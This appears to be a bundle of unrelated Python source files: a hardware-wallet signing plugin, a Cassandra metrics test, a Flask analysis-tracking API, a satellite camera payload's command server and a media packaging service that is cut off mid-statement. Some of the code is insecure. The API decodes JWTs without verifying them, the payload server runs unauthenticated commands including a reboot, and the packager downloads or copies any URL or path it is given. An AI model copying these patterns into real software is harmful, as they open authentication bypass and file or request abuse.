return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_safet_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_safet_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx: Transaction):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if info.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
test_cassandra.py
|
# (C) Datadog, Inc. 2010-2016
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
# stdlib
import threading
import time
from types import ListType
import unittest
import os
import mock
# 3p
from nose.plugins.attrib import attr
# project
from aggregator import MetricsAggregator
import logging
LOG_INFO = {
'log_level': None,
'log_to_event_viewer': False,
'log_to_syslog': False,
'syslog_host': None,
'syslog_port': None,
'log_level': logging.INFO,
'disable_file_logging': True,
'collector_log_file': '/var/log/stackstate/collector.log',
'forwarder_log_file': '/var/log/stackstate/forwarder.log',
'dogstatsd_log_file': '/var/log/stackstate/dogstatsd.log',
'jmxfetch_log_file': '/var/log/stackstate/jmxfetch.log',
'go-metro_log_file': '/var/log/stackstate/go-metro.log',
}
with mock.patch('config.get_logging_config', return_value=LOG_INFO):
from stsstatsd import Server
from jmxfetch import JMXFetch
log = logging.getLogger('cassandra_test')
STATSD_PORT = 8121
class DummyReporter(threading.Thread):
def __init__(self, metrics_aggregator):
threading.Thread.__init__(self)
self.finished = threading.Event()
self.metrics_aggregator = metrics_aggregator
self.interval = 10
self.metrics = None
self.finished = False
self.start()
def run(self):
while not self.finished:
time.sleep(self.interval)
self.flush()
def flush(self):
metrics = self.metrics_aggregator.flush()
if metrics:
self.metrics = metrics
@attr(requires='cassandra')
class JMXTestCase(unittest.TestCase):
def setUp(self):
aggregator = MetricsAggregator("test_host")
self.server = Server(aggregator, "localhost", STATSD_PORT)
self.reporter = DummyReporter(aggregator)
self.t1 = threading.Thread(target=self.server.start)
self.t1.start()
confd_path = os.path.join(os.path.dirname(__file__), 'ci')
self.jmx_daemon = JMXFetch(confd_path, {'dogstatsd_port': STATSD_PORT})
self.t2 = threading.Thread(target=self.jmx_daemon.run)
self.t2.start()
def tearDown(self):
self.server.stop()
self.reporter.finished = True
self.jmx_daemon.terminate()
def testCustomJMXMetric(self):
count = 0
while self.reporter.metrics is None:
time.sleep(1)
count += 1
if count > 25:
raise Exception("No metrics were received in 25 seconds")
metrics = self.reporter.metrics
self.assertTrue(isinstance(metrics, ListType))
self.assertTrue(len(metrics) > 0)
log.info([t for t in metrics if "cassandra." in t['metric'] and "instance:cassandra_instance" in t['tags']])
log.info(metrics)
log.info(len([t for t in metrics if "cassandra." in t['metric'] and "instance:cassandra_instance" in t['tags']]))
log.info(len([t for t in metrics if "instance:cassandra_instance" in t['tags']]))
log.info(len([t for t in metrics if "cassandra." in t['metric']]))
log.info(len(metrics))
self.assertTrue(len([t for t in metrics if "cassandra." in t['metric'] and "instance:cassandra_instance" in t['tags']]) > 40, metrics)
|
api.py
|
import datetime
import multiprocessing
import os
from typing import Dict, Mapping
from dateutil.parser import parse as parse_datestr
from flask import Blueprint, abort, g, jsonify, make_response, request
from google.auth import jwt
from trailblazer.server.ext import store
blueprint = Blueprint("api", __name__, url_prefix="/api/v1")
def stringify_timestamps(data: dict) -> Dict[str, str]:
"""Convert datetime into string before dumping in order to avoid information loss"""
for key, val in data.items():
if isinstance(val, datetime.datetime):
data[key] = str(val)
return data
@blueprint.before_request
def before_request():
"""Authentication that is run before processing requests to the application"""
if request.method == "OPTIONS":
return make_response(jsonify(ok=True), 204)
if os.environ.get("SCOPE") == "DEVELOPMENT":
return
auth_header = request.headers.get("Authorization")
if auth_header:
jwt_token = auth_header.split("Bearer ")[-1]
else:
return abort(403, "no JWT token found on request")
user_data: Mapping = jwt.decode(jwt_token, verify=False)
user_obj = store.user(user_data["email"], include_archived=False)
if user_obj is None:
return abort(403, f"{user_data['email']} doesn't have access")
g.current_user = user_obj
@blueprint.route("/analyses")
def analyses():
"""Display analyses."""
per_page = int(request.args.get("per_page", 100))
page = int(request.args.get("page", 1))
query = store.analyses(
status=request.args.get("status"),
query=request.args.get("query"),
is_visible=request.args.get("is_visible") == "true" or None,
)
query_page = query.paginate(page, per_page=per_page)
data = []
for analysis_obj in query_page.items:
analysis_data = analysis_obj.to_dict()
analysis_data["user"] = analysis_obj.user.to_dict() if analysis_obj.user else None
analysis_data["failed_jobs"] = [job_obj.to_dict() for job_obj in analysis_obj.failed_jobs]
data.append(analysis_data)
return jsonify(analyses=data)
@blueprint.route("/analyses/<int:analysis_id>", methods=["GET", "PUT"])
def analysis(analysis_id):
"""Display a single analysis."""
analysis_obj = store.analysis(analysis_id)
if analysis_obj is None:
return abort(404)
if request.method == "PUT":
analysis_obj.update(request.json)
store.commit()
data = analysis_obj.to_dict()
data["failed_jobs"] = [job_obj.to_dict() for job_obj in analysis_obj.failed_jobs]
data["user"] = analysis_obj.user.to_dict() if analysis_obj.user else None
return jsonify(**data)
@blueprint.route("/info")
def info():
"""Display meta data about database."""
metadata_obj = store.info()
return jsonify(**metadata_obj.to_dict())
@blueprint.route("/me")
def me():
"""Return information about a logged in user."""
return jsonify(**g.current_user.to_dict())
@blueprint.route("/aggregate/jobs")
def aggregate_jobs():
"""Return stats about jobs."""
days_back = int(request.args.get("days_back", 31))
one_month_ago = datetime.datetime.now() - datetime.timedelta(days=days_back)
data = store.aggregate_failed(one_month_ago)
return jsonify(jobs=data)
@blueprint.route("/update-all")
def update_analyses():
"""Update all ongoing analysis by querying SLURM"""
process = multiprocessing.Process(target=store.update_ongoing_analyses, kwargs={"ssh": True})
process.start()
return jsonify(f"Success! Trailblazer updated {datetime.datetime.now()}"), 201
@blueprint.route("/update/<int:analysis_id>", methods=["PUT"])
def update_analysis(analysis_id):
"""Update a specific analysis"""
try:
process = multiprocessing.Process(
target=store.update_run_status, kwargs={"analysis_id": analysis_id, "ssh": True}
)
process.start()
return jsonify("Success! Update request sent"), 201
except Exception as e:
return jsonify(f"Exception: {e}"), 409
@blueprint.route("/cancel/<int:analysis_id>", methods=["PUT"])
def cancel(analysis_id):
"""Cancel an analysis and all slurm jobs associated with it"""
auth_header = request.headers.get("Authorization")
jwt_token = auth_header.split("Bearer ")[-1]
user_data = jwt.decode(jwt_token, verify=False)
try:
process = multiprocessing.Process(
target=store.cancel_analysis,
kwargs={"analysis_id": analysis_id, "email": user_data["email"], "ssh": True},
)
process.start()
return jsonify("Success! Cancel request sent"), 201
except Exception as e:
return jsonify(f"Exception: {e}"), 409
@blueprint.route("/delete/<int:analysis_id>", methods=["PUT"])
def delete(analysis_id):
"""Cancel an analysis and all slurm jobs associated with it"""
try:
process = multiprocessing.Process(
target=store.delete_analysis,
kwargs={"analysis_id": analysis_id, "force": True},
)
process.start()
return jsonify("Success! Delete request sent!"), 201
except Exception as e:
return jsonify(f"Exception: {e}"), 409
# CG REST INTERFACE ###
# ONLY POST routes which accept messages in specific format
# NOT for use with GUI (for now)
@blueprint.route("/query-analyses", methods=["POST"])
def post_query_analyses():
"""Return list of analyses matching the query terms"""
content = request.json
query_analyses = store.analyses(
case_id=content.get("case_id"),
query=content.get("query"),
status=content.get("status"),
deleted=content.get("deleted"),
temp=content.get("temp"),
before=parse_datestr(content.get("before")) if content.get("before") else None,
is_visible=content.get("visible"),
family=content.get("family"),
data_analysis=content.get("data_analysis"),
)
data = [stringify_timestamps(analysis_obj.to_dict()) for analysis_obj in query_analyses]
return jsonify(*data), 200
@blueprint.route("/get-latest-analysis", methods=["POST"])
def post_get_latest_analysis():
"""Return latest analysis entry for specified case"""
content = request.json
analysis_obj = store.get_latest_analysis(case_id=content.get("case_id"))
if analysis_obj:
data = stringify_timestamps(analysis_obj.to_dict())
return jsonify(**data), 200
return jsonify(None), 200
@blueprint.route("/find-analysis", methods=["POST"])
def post_find_analysis():
"""Find analysis using case_id, date, and status"""
content = request.json
analysis_obj = store.get_analysis(
case_id=content.get("case_id"),
started_at=parse_datestr(content.get("started_at")),
status=content.get("status"),
)
if analysis_obj:
data = stringify_timestamps(analysis_obj.to_dict())
return jsonify(**data), 200
return jsonify(None), 200
@blueprint.route("/delete-analysis", methods=["POST"])
def post_delete_analysis():
"""Delete analysis using analysis_id. If analysis is ongoing, error will be raised.
To delete ongoing analysis, --force flag should also be passed.
If an ongoing analysis is deleted in ths manner, all ongoing jobs will be cancelled"""
content = request.json
try:
store.delete_analysis(analysis_id=content.get("analysis_id"), force=content.get("force"))
return jsonify(None), 201
except Exception as e:
return jsonify(f"Exception: {e}"), 409
@blueprint.route("/mark-analyses-deleted", methods=["POST"])
def post_mark_analyses_deleted():
"""Mark all analysis belonging to a case deleted"""
content = request.json
old_analyses = store.mark_analyses_deleted(case_id=content.get("case_id"))
data = [stringify_timestamps(analysis_obj.to_dict()) for analysis_obj in old_analyses]
if data:
return jsonify(*data), 201
return jsonify(None), 201
@blueprint.route("/add-pending-analysis", methods=["POST"])
def post_add_pending_analysis():
"""Add new analysis with pending status"""
content = request.json
try:
analysis_obj = store.add_pending_analysis(
case_id=content.get("case_id"),
email=content.get("email"),
type=content.get("type"),
config_path=content.get("config_path"),
out_dir=content.get("out_dir"),
priority=content.get("priority"),
data_analysis=content.get("data_analysis"),
)
data = stringify_timestamps(analysis_obj.to_dict())
return jsonify(**data), 201
except Exception as e:
return jsonify(f"Exception: {e}"), 409
|
Server.py
|
### BAAMSAT CAMERA PAYLOAD SERVER ###
import socket
import logging
import queue
import csv
import threading
import os
from datetime import datetime
from time import sleep
from multiprocessing import Process
from gpiozero import CPUTemperature
from temperature_Sensor import Temperature_Sensor
from mosfet import Mosfet
from camera import Camera
from current_sensor import Current_sensor
from auto_mode import AutoMode
"""
Class to instantiate the Logging system of the payload
"""
class Log:
def __init__(self,filename):
logging.basicConfig(filename=filename, format='[%(levelname)s] %(asctime)s: %(message)s',level=logging.INFO)
"""
Class to instantiate the server
"""
class Server:
def __init__(self,Host,Port): # Constructor of the class, specify the Host and the Port of the connection
self.Host = Host
self.Port = Port
def get_Host(self):
return self.Host
def get_Port(self):
return self.Port
def set_Host(self,Host):
self.Host = Host
def set_Port(self,Port):
self.Port = Port
def set_temp_sensor(self,temp_sensor):
self.temp_sensor = temp_sensor
def set_mosfets(self,mosfets):
self.mosfet_list = mosfets
def set_interval_temp(self,interval):
self.interval_temp = interval
def set_interval_temp(self,interval):
self.interval_mosfet = interval
def set_camera(self,cam):
self.camera = cam
def set_automode(self,automode):
self.auto_mode = automode
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Socket for the TCP connection
connection = 0
process_save_temp = 0 # Process of Saving temp
in_process_save_temp = False # Bool to keep track of in process or not
in_connection = False
temp_sensor = [] # List of the temperature sensors in the payload
interval_temp = 2 # Interval between the measurement of the temperature
interval_mosfet = 2 # Interval between the update of the mosfets
mosfet_list = [] # List of the mosfets in the payload
process_auto_heat = 0 # Process of Auto Heat
in_process_auto_heat = False
camera = 0 # Save the camera object into the Server class
process_record = 0
in_process_record = False
process_currrent = 0
process_time_lapse = 0
in_process_time_lapse = False
in_save_current = False
auto_mode = 0
in_auto_mode = False
process_auto_mode = 0
auto_heat_temp_treshold = 15 # Threshold for the activation of the Mosfet and so the heating system
def __setup_connection(self): # Function to initiate the connection between the ground computer and the payload
try:
self.socket.listen(1) # Waiting for the connaciton
print("Waiting for connection")
logging.info("Waiting for connection")
conn, addr = self.socket.accept()
print("Connected with: {}".format(addr))
logging.info("Connected with: {}".format(addr))
return conn
except:
print("No connection found")
logging.error("No connection found")
def save_current(self,filename): # Function to save the current values inside a csv file
with open(filename,mode="a") as csv_file:
csv_file.write("{0},{1},{2},{3}\n".format("Date","Tension","Intensite","Puissance"))
while True:
current = get_curent()
csv_file.write("{0},{1},{2},{3}\n".format(str(datetime.now()),str(current[0]),str(current[1]),str(current[2])))
csv_file.flush()
sleep(2)
def establish_connection(self): # Function to establish the connection with the ground computer
try:
print("Connection on Port {} Open".format(self.Port))
logging.info("Connection on Port {} Open".format(self.Port))
self.socket.bind((self.Host,self.Port))
self.connection = self.__setup_connection()
self.in_connection = True
except:
print("Can't open connection")
logging.error("Can't open connection")
def __command_library(self,command,data): # Function containing the command dictionnary
reply = ""
if command == 'REPEAT': # REPEAT command to test the connection
reply = data[1]
elif command == 'LOGOUT' or command == 'MODULE_OFF': # Logging out command
print('System logout')
reply = 'Server logging out'
elif command == 'SAVE_TEMP': # Command to save launch the saving of the temperature
self.process_save_temp = Process(target=self.save_temp,args=(self.temp_sensor,"temp.csv",)) # create the process
self.in_process_save_temp = True
self.process_save_temp.start() # start the process
reply = 'oui'
elif command == 'STOP_SAVE_TEMP': # Command to stop the save of the temp
if self.in_process_save_temp:
self.process_save_temp.terminate()
self.in_process_save_temp = False
reply = 'Process stopped'
else:
print("Can't stop save temp, not in process")
logging.error("Can't stop save temp, not in process")
reply = "Can't stop save temp, not in process"
elif command == 'VIDEO_RECORDING_START': # Command to start the recording
try:
self.process_record = Process(target=self.camera.start_recording,args=(self.camera.resolution_video,self.camera.fps,))
self.in_process_record = True
self.process_record.start()
reply = 'Camera started recording'
print("Camera started recording")
logging.info("Camera started recording")
except:
print("Can't start the recording")
logging.error("Can't start the recording")
elif command == 'VIDEO_RECORDING_STOP': # Command to stop the recording
if self.in_process_record:
self.in_process_record = False
self.camera.stop_recording()
reply = 'Recording stopped'
else:
print("Can't stop recording, not in process")
logging.error("Can't stop recording, not in process")
reply = "Can't stop recording, not in process"
elif command == "SET_VIDEO_RES": # Command to change the video resolution
self.camera.set_video_res(data[1])
logging.info("Video resolution set to "+data[1])
reply = "Video resolution set to "+data[1]
elif command == "TIME_LAPSE_RECORDING_START": # Command to start the timelapse recording
try:
self.process_time_lapse = Process(target=self.camera.start_timelapse)
self.in_process_time_lapse = True
self.process_time_lapse.start()
reply = 'Time Lapse started'
print("Time Lapse started")
logging.info("Time Lapse started")
except:
print("Can't start the Time Lapse")
logging.error("Can't start the Time Laps")
elif command == 'TIME_LAPSE_RECORDING_STOP': # COmmand to stop the Timelapse recording
if self.in_process_time_lapse:
self.in_process_time_lapse = False
self.process_time_lapse.terminate()
reply = 'Time Lapse stopped'
else:
print("Can't stop time lapse, not in process")
logging.error("Can't stop time lapse, not in process")
reply = "Can't stop time lapse, not in process"
elif command == 'SET_TIME_LAPSE_RES': # Command to change the timelapse resolution
self.camera.set_time_lapse_resolution(data[1])
logging.info("Time Lapse resolution set to "+data[1])
reply = "Time Lapse resolution set to "+data[1]
elif command == "SET_TIME_LAPSE_IT": # Command to change the timelapse interval
self.camera.set_timelaps_delay(int(data[1]))
logging.info("Time Lapse interval set to "+data[1])
reply = "Time Lapse interval set to "+data[1]
elif command == "SET_VIDEO_FPS": # Command to change the fps of the recorded video
self.camera.set_fps(int(data[1]))
logging.info("Video FPS set to "+data[1])
reply = "Video FPS set to "+data[1]
elif command == 'SAVE_CURRENT': # Command to save the Current values
self.in_save_current = True
self.process_currrent = Process(target=self.save_current,args=("current.csv",))
reply = 'Recording current'
elif command == 'STOP_SAVE_CURRENT': # Command to stop the save of the current
self.process_currrent.terminate()
reply = 'Stop Recording Current'
elif command == 'REBOOT': # Command to reboot the payload system, and so the raspberry pi
os.system("sudo reboot")
reply = 'Stop Recording Current'
elif command == 'GET_STATE': # Command to get the state of the payload
reply = "\nCurrent state of the system:\nSAVE TEMP: {}\nSAVE CURRENT: {}\nAUTO HEAT: {}\nIN RECORD: {}\nIN TIMELAPSE: {}".format(self.in_process_save_temp,self.in_save_current,self.in_process_auto_heat,self.in_process_record,self.in_process_time_lapse)
elif command == 'THERMAL_SET': # Command to change the temp threshold
self.auto_heat_temp_treshold = int(data[1])
print("Thermal auto heat set to "+data[1])
logging.error("Thermal auto heat set to "+data[1])
reply = "Thermal auto heat set to "+data[1]
elif command == 'SENSOR_READ': # Command to get the temperature in live
temp = self.read_temp(self.temp_sensor)
reply="\nTemperature °C:\nBattery: {}\nCamera: {}\nRaspberry: {}".format(temp[0],temp[1],temp[2])
elif command == 'DOWNLINK_IMAGE': # Command to get an image preview
data = self.camera.get_image_downlink()
print(data)
reply=data
elif command == 'AUTO_HEAT_START': # Command to start the autonomous heating system
self.process_auto_heat = threading.Thread(target = self.update_mosfets)
self.in_process_auto_heat = True
self.process_auto_heat.start()
reply = 'Auto heat ON'
elif command == 'AUTO_HEAT_STOP': # Command to stop the heating system
if self.in_process_auto_heat:
self.in_process_auto_heat = False
for mosfet in self.mosfet_list:
mosfet.set_pwm(0)
reply = 'Auto Heat stopped'
else:
print("Can't stop auto heat, not in process")
logging.error("Can't stop auto heat, not in process")
reply = "Can't stop auto heat, not in process"
elif command == 'AUTO_MODE_START':
self.in_auto_mode = True
self.process_auto_mode = Process(target=self.start_automode)
self.process_auto_mode.start()
reply = 'Auto Mode On'
elif command == 'AUTO_MODE_STOP':
self.in_auto_mode = False
reply = 'Auto Mode Off'
elif command == 'GET_AUTO_MODE_LIST':
reply = self.auto_mode.print_command_list()
elif command == 'ADD_COMMAND':
com = data[1].split(' ',1)
print(com)
if len(com) == 2:
self.auto_mode.add_command(com[0],com[1])
else:
self.auto_mode.add_command(com[0])
reply = "command added"
elif command == 'DELETE_COMMAND':
self.auto_mode.delete_command(int(data[1]))
reply = "command deleted"
elif command == 'SAVE_COMMAND_HISTORY':
self.auto_mode.save_command_history()
reply='History saved'
else:
reply = 'No command found'
return reply
def start_automode(self):
self.auto_mode.print_command_list()
com,length = self.auto_mode.read_command()
while com != None and self.in_auto_mode == True:
self.__command_library(com,com)
if length == None:
pass
else:
sleep(int(length))
self.auto_mode.print_command_list()
com,length = self.auto_mode.read_command()
def establish_communication(self): # Function that allow the communication between the ground and the payload
if self.in_connection:
print("Communication establish")
logging.info("Communication establish")
while True:
data = self.connection.recv(1024)
if not data == '':
data = data.decode('utf-8')
print('Data Received: {}'.format(data))
logging.info('Data Received: {}'.format(data))
data = data.split(' ',1)
command = data[0]
reply = self.__command_library(command,data)
if command == 'LOGOUT':
break
try:
self.connection.sendall(reply.encode('utf-8'))
except:
print(len(reply))
print(len(reply.ljust(1024)))
length = str(len(reply))
self.connection.sendall(length.encode('utf-8'))
self.connection.sendall(reply)
print('Reply sent')
logging.info('Reply sent')
else:
print("No Connection, Can't establish the communications")
logging.error("No Connection, Can't establish the communications")
def save_temp(self,sensor_list,filename): # Function to save the temp
with open(filename,mode="a") as csv_file:
csv_file.write("{0},{1},{2},{3},{4}\n".format("Date","Battery","Camera","Raspberry","CPU"))
while True:
temp = []
for sensor in sensor_list:
temp.append(sensor.get_temp())
csv_file.write("{0},{1},{2},{3},{4}\n".format(str(datetime.now()),str(temp[0]),str(temp[1]),str(temp[2]),str(self.get_temp_cpu())))
logging.info("{0},{1},{2},{3},{4}\n".format(str(datetime.now()),str(temp[0]),str(temp[1]),str(temp[2]),str(self.get_temp_cpu())))
csv_file.flush()
sleep(self.interval_temp)
def read_temp(self,sensor_list): # function to answer the command Get temp
temp = []
for sensor in sensor_list:
temp.append(sensor.get_temp())
return temp
def get_DutyCycle(self,temp): # Function to calculate the Duty Cycle of the PWM of a mosfet according to the temp
offset = 0
temp = temp - offset
upper_bound = self.auto_heat_temp_treshold
lower_bound = 0
diff = upper_bound - lower_bound
pwm = -(temp/diff)*100 + 100
print(pwm)
if pwm > 100:
pwm = 100
if pwm < 0:
pwm= 0
if temp < 0:
pwm = 100
if pwm != 0:
logging.info("PWM actif dutycyle: {}".format(pwm))
return pwm
def update_mosfets(self): # Fonction to update the Duty Cycle of each masfets
while self.in_process_auto_heat:
for k in range(len(self.mosfet_list)):
temp = self.temp_sensor[k].get_temp()
pwm = self.get_DutyCycle(temp)
self.mosfet_list[k].set_pwm(pwm)
sleep(self.interval_mosfet)
def get_temp_cpu(self): # Get the temp of the Raspberry Pi CPU
cpu = CPUTemperature()
return cpu.temperature
def get_nb_photos():
nb_photo = 1
fileName = "./images/timelaps_"+str(nb_photo)+".jpeg"
while os.path.exists(fileName):
nb_photo += 1
fileName = "./images/timelaps_"+str(nb_photo)+".jpeg"
return nb_photo
def __main__(): # Main fonction of the Server
nb_phot = get_nb_photos()
log = Log("log_test.txt") # initiate the logging system
server = Server('',5005) # Initiate the Server Object
temp_raspberry= Temperature_Sensor(0x1A) # Declaration of the Temperature Sensors
temp_camera = Temperature_Sensor(0x19)
temp_battery = Temperature_Sensor(0x18)
server.set_temp_sensor([temp_battery,temp_camera,temp_raspberry])
mosfet_camera = Mosfet(23) # Declaration of the Mosfets
mosfet_battery = Mosfet(24)
server.set_mosfets([mosfet_battery,mosfet_camera])
cam = Camera("mjpeg") # Declaration of the camera
cam.set_nb_photos(nb_phot)
auto_mode = AutoMode("command_AutoMode.pkl")
server.set_automode(auto_mode)
server.set_camera(cam)
server.establish_connection() # Start the communication
server.establish_communication()
__main__()
|
imackager.py
|
#!/usr/bin/env python3
import subprocess
from xml.dom import minidom
from xml.dom.minidom import Node
import os
import shutil
import xml.etree.ElementTree as ET
import urllib.request
from flask import Flask, request, jsonify, send_from_directory
from urllib.parse import urlparse
import urllib.parse
import os.path
import random
import string
import json
from pprint import pprint
from shutil import copyfile
from threading import Thread
from itertools import groupby
app = Flask(__name__)
class InvalidUsage(Exception):
status_code = 400
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
@app.route('/dash/<path:path>')
def send_js(path):
return send_from_directory('dash', path)
@app.errorhandler(InvalidUsage)
def handle_invalid_usage(error):
response = jsonify(error.to_dict())
response.status_code = error.status_code
return response
@app.route("/")
def home():
return "Imackager is running fine"
def escape(u):
p = urlparse(u)
r = p._replace(path=urllib.parse.quote(p.path))
url = r.geturl()
return url
def download(workdir, u, custom_extension = ""):
if (u.startswith('http://')) or (u.startswith('https://')):
# p = urlparse(u)
# r = p._replace(path=urllib.parse.quote(p.path))
# url = r.geturl()
basename = os.path.splitext(os.path.basename(u))[0]
extension = os.path.splitext(os.path.basename(u))[1]
print("Downloading " + u+ " to " + workdir + basename + custom_extension+ extension)
urllib.request.urlretrieve (u, workdir + basename + custom_extension+ extension)
print(u + " downloaded")
return workdir + basename +custom_extension+ extension
else:
url = u
print("Copying " + url)
basename = os.path.splitext(os.path.basename(url))[0]
extension = os.path.splitext(os.path.basename(url))[1]
copyfile(url, workdir + basename + custom_extension +extension)
print(url + " copied")
return workdir + basename + custom_extension + extension
@app.route("/test_callback", methods=["POST"])
def callback():
content = request.json
pprint(content)
return "ok"
def removeDupicates(p):
lines = []
with open(p) as f:
content = f.readlines()
lines = [x[0] for x in groupby(content)]
outF = open(p, "w")
for line in lines:
outF.write(line)
outF.close()
def sendResp(url, resp):
params = json.dumps(resp).encode('utf8')
req = urllib.request.Request(url, data=params,
headers={'content-type': 'application/json'})
response = urllib.request.urlopen(req)
def mapLang(lang):
if lang.startswith( 'ca' ):
return "cat"
if lang.startswith( 'en' ):
return "eng"
if lang.startswith( 'de' ):
return "deu"
if lang.startswith( 'es' ):
return "esp"
else:
return lang
def mapLangSL(lang):
if lang.startswith( 'ca' ):
return "csc"
elif lang.startswith( 'en_US' ):
return "ase"
elif lang.startswith( 'en' ):
return "bfi"
elif lang.startswith( 'de' ):
return "gsg"
elif lang.startswith( 'es' ):
return "ssp"
else:
return lang
def mapLang2(lang):
if lang.startswith( 'ca' ):
return "ca"
if lang.startswith( 'en' ):
return "en"
if lang.startswith( 'de' ):
return "de"
if lang.startswith( 'es' ):
return "es"
else:
return lang
def remove_blanks(node):
for x in node.childNodes:
if x.nodeType == Node.TEXT_NODE:
if x.nodeValue:
x.nodeValue = x.nodeValue.strip()
elif x.nodeType == Node.ELEMENT_NODE:
remove_blanks(x)
def tcToMilliseconds(timecode):
comps = timecode.split(':')
return int(comps[0])*3600000+ int(comps[1])*60000 + float(comps[2])*1000
def package(content):
workdir = "/tmp/" + ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10)) + "/"
os.mkdir(workdir)
packagedDir = content["publicationCdn"] + "/"
jsonBDD = content["publicationFile"].replace("https://imac.gpac-licensing.com/", "/var/www/html/")
resolutions = content["files"]["mainVideo"][0]["transcode"]
videoFile = content["files"]["mainVideo"][0]["url"]
originalLang =content["language"]
if content["language"] == "de":
content["language"] = "Deutsch"
elif content["language"] == "fr":
content["language"] = "Français"
elif content["language"] == "ca":
content["language"] = "Català"
elif content["language"] == "es":
content["language"] = "Español"
else:
content["language"] = "English"
dirName = str(content["assetId"]) +"/"
outputDir = packagedDir + dirName
if os.path.isdir(outputDir):
shutil.rmtree(outputDir)
os.mkdir(outputDir)
videoBasename = os.path.splitext(os.path.basename(videoFile))[0]
try:
videoFile = download(workdir, videoFile)
except Exception as err:
print(err)
sendResp(content["callbackUrl"], {"result":0, "assetId":content["assetId"], "language": content["language"], "msg": "Could not download " + videoFile } )
return
for resolution in resolutions:
print("Transcoding the resolution " + str(resolution))
args = ["ffmpeg", "-y", "-i", videoFile, "-an",
"-vf", "scale=-2:"+str(resolution)+",fps=fps=30", "-c:v",
"libx264", "-bf", "0", "-crf", "22", "-keyint_min", "60", "-g", "60", "-sc_threshold", "0","-write_tmcd", "0",
outputDir + videoBasename
